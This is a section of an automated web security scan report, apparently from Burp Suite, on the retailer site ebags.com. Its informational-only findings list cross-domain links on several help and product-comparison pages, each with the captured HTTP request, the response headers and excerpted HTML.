http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /help/index.cfm?fuseaction=suggest&HelpCenter_Link=Suggestions HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:18 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D7C4E0%5C710F0A6ABDF; expires=Sun, 02-Jan-2011 14:04:18 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<td align="right" rowspan="10" width="20"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="20" height="1"></td>
<td align="right" width="160"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="160" height="1"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.6. http://www.ebags.com/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/help/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/help/index.cfm?fuseaction=ReturnPolicy

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_return_an_item.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /help/index.cfm?fuseaction=ReturnPolicy HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:02 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:04:02 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="https://www.ebags.com/help/index.cfm?fuseaction=returnItem&HelpCenter_Link=IWantToReturnItem"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_return_an_item.gif" alt="Return An Item" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

4.7. http://www.ebags.com/info/Compare/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/info/Compare/index.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/info/Compare/index.cfm?fuseaction=chart&similarchart=120830

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/126770_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/57102_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/138043_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/120654_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/126769_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

GET /info/Compare/index.cfm?fuseaction=chart&similarchart=120830 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:17:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 56187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/case_logic/nintendo_ds_174_game_case/product_detail/index.cfm?modelID=120654&productid=1312286"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im4/120654_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/nintendo_ds_trade_game_case/product_detail/index.cfm?modelID=126769&productid=1328568"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im9/126769_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/30_capacity_cd_visor/product_detail/index.cfm?modelID=57102&productid=641205"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im2/57102_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/sony_psp_174_game_case/product_detail/index.cfm?modelID=126770&productid=1328570"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/126770_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/case_logic/portable_hard_drive_case/product_detail/index.cfm?modelID=138043&productid=1357927"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im3/138043_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=85&wid=85" WIDTH=85 border=0 height=85 vspace=6></a>
...[SNIP]...
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=120654&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=126769&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=57102&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=126770&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
</TD>
<TD>
<a href="/shoppingcart/index.cfm?fuseaction=add_partial_cart&modelID=138043&RequireCookie=yes"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/btn_addtocart_2.gif" border=0></a>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="84%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="58"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="85%" height="1"></td>
<td bgcolor="#999999" width="10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="15%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="88%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="61"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="89%" height="1"></td>
<td bgcolor="#999999" width="7"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="11%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="84%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="58"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="85%" height="1"></td>
<td bgcolor="#999999" width="10"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="15%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<td colspan="4" bgcolor="#000000"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="70" height="1"></td></tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
<td bgcolor="#cccccc" width="68" colspan="2">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/RB_new.gif" width="99%" height=6></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="6"></td>
</tr>
<tr>
<td bgcolor="#000000" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
<td bgcolor="#000000" width="68"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="100%" height="1"></td>
<td bgcolor="#999999" width="0"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="0%" height="1"></td>
<td bgcolor="#999999" width="1"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/s.gif" width="1" height="1"></td>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
